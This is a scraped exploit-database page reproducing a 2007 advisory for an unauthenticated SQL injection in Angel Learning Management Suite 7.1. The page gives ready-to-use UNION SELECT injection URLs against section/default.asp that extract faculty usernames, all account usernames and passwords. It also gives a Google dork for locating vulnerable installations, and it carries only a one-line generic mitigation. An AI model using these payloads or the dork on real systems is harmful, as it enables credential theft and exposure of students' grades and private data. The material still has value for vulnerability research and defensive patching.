Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wp-pagenavi domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6114
Angel Learning Management Suite 7.1 SQL Injection Vulnerability - exploit.company
header-logo
Suggest Exploit
vendor:
Angel Learning Management Suite
by:
Craig Heffner
7.5
CVSS
HIGH
SQL injection
89
CWE
Product Name: Angel Learning Management Suite
Affected Version From: 7.1
Affected Version To: 7.1
Patch Exists: NO
Related CWE: Unknown
CPE: a:angel_learning:management_suite:7.1
Metasploit:
Other Scripts:
Platforms Tested: Unknown
Unknown

Angel Learning Management Suite 7.1 SQL Injection Vulnerability

Angel 7.1 contains an SQL injection vulnerability in section/default.asp that grants an un-authenticated user access to all database tables and data. Examples include enumeration of tables, columns, user names, passwords, grades, and test questions/answers.

Mitigation:

Apply appropriate input validation and sanitization techniques to prevent SQL injection attacks. Regularly update and patch the software to fix any security vulnerabilities.
Source

Exploit-DB raw data:

#########################################################################
#
# Application:
#
#		Angel Learning Management Suite 7.1
#		http://www.angellearning.com
#
#########################################################################
#
# Description:
#
#		"ANGEL LMS is an inclusive suite of enterprise 
#		learning management tools that balances ease of 
#		use with powerful capabilities to deliver leading 
#		edge teaching and learning, impact learner success 
#		and measure effectiveness."
#
#		Basically, Angel is a CMS for education, providing
#		online forums, grading, email, chat, etc to faculty
#		and students. It is used as the primary Web interface
#		for several online schools and courses.
#
#########################################################################
#
# Vulnerability:
#
#		Angel 7.1 contains an SQL injection vulnerability in 
#		section/default.asp that grants an un-authenticated user 
#		access to all database tables and data. Examples include 
#		enumeration of tables, columns, user names, passwords, 
#		grades, and test questions/answers (you basically have 
#		access to everything).
#	
#########################################################################
#	
# Exploit Examples:
#
#	#Enumerate Faculty User Accounts#
#		http://[Angel Root Directory]/section/default.asp?id='%20union%20select%20top%201%20username%20from%20faculty_accounts--"
#		
#	#Enumerate All User Accounts#
#		http://[Angel Root Directory]/section/default.asp?id='%20union%20select%20top%201%20username%20from%20accounts--"
#
#	#Enumerate Account Passwords#
#		http://[Angel Root Directory]/section/default.asp?id='%20union%20select%20top%201%20password%20from%20accounts--"
#
#########################################################################
#
# Google Dork:
#		intext:"2006 angel learning, inc" -pdf
#
#########################################################################
#
# Credit:
#	Exploit discovered and coded by Craig Heffner
#	heffnercj [at] gmail.com
#	http://www.craigheffner.com
#
#########################################################################

# milw0rm.com [2007-03-01]

Navigation

Suggest Exploit

Services By CQR